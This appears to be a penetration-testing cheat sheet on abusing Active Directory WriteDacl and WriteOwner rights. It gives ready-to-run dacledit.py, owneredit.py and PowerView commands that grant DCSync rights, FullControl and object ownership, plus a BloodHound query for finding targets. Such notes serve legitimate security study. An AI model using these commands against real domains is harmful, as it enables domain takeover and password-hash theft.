Granting Rights and Ownership

Permissions such as WriteDacl and Ownership, play a crucial role in controlling access to objects and ensuring their security. The WriteDacl access right refers to the privilege that allows an account to modify the DACL of a target object. Ownership on the other hand denotes the state of possessing administrative control over an object. Understanding the significance of these access rights is essential as they can impact the vulnerability and potential abuses associated with the manipulated DACL.

If we possess an account with privileges to modify a target object's DACL we can use that account to edit the target's DACL and make it vulnerable to other attacks.

WriteDacl

Once we find an account with WriteDacl or Ownership over another object we can modify the DACLs to, for example, add DCSync permissions towards the entire domain

dacledit.py -principal otter -target-dn dc=domain,dc=com -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' -action write -rights DCSync

Import-Module .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity $(Get-DomainSID) -PrincipalIdentity otter -Rights DCSync -Verbose

Another option would be adding ourselves to a group

dacledit.py -principal otter -target "Vulnerable Group" -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'

Now we can add ourselves or another user to a group like we did in the AddMembers section.

WriteOwner

This DACL allows us to modify the owner of the target object, specifically the OwnerSid sub-attribute within the object's security descriptor.

MATCH p=((n:User)-[r:WriteOwner]->(m)) RETURN p

With this kind of right we can perform a GPO attack. Specifically, we can abuse WriteOwner by using owneredit

owneredit.py -action write -new-owner otter -target targetUser -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'

usually this step is followed by changing the DACL of the new user to something like FullControl

dacledit.py -principal otter -target targetUser -action write -rights FullControl -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'

From Windows we can do something similar

Set-DomainObjectOwner -Identity targetUser -OwnerIdentity otter -Verbose
Add-DomainObjectAcl -TargetIdentity targetUser -PrincipalIdentity otter -Rights All -Verbose